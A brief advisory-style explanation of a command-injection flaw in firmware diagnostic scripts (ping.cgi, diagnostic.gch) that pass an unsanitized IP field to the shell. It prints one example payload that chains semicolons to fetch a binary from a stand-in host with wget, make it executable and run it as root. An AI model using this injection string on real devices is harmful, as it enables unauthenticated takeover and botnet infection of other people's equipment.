The "Diagnostic" CGI Vulnerability:

Several firmware versions contained a flaw in the ping.cgi or diagnostic.gch scripts. These scripts took user input for an IP address and passed it unsanitized to the underlying Linux ping command. By appending semicolons and shell commands (e.g., ; wget http://malicious.com/bot -O /tmp/bot ; chmod +x /tmp/bot ; /tmp/bot ), an unauthenticated attacker could achieve remote command execution (RCE) with root privileges.
